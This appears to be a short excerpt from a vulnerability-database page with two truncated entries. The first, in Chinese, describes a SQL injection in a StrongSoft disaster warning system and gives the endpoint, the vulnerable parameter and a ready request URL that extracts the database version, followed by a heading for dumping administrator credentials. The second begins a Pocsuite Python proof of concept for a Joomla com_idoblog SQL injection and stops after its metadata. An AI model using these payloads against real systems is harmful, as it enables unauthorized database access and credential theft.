StrongSoft灾害预警系统strFieldName参数SQL注入漏洞

注入链接：/Response/AjaxHandle/AjaxSingleGetReferenceFieldValue.ashx 注入参数：strFieldName 【获取数据库版本】 /Response/AjaxHandle/AjaxSingleGetReferenceFieldValue.ashx?strFieldValue=1&strSelectFieldCollection=1&tableName=sysobjects&strFieldName=convertint,@@version 【管理员账号密码】...

Joomla Component (com_idoblog) SQL Injection Vulnerability

No description provided by source. !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register import re class TestPOCPOCBase: vulID = '70468' ssvid version = '1.0' author = 'kikay' vulDate = '2010-12-25' createDate ...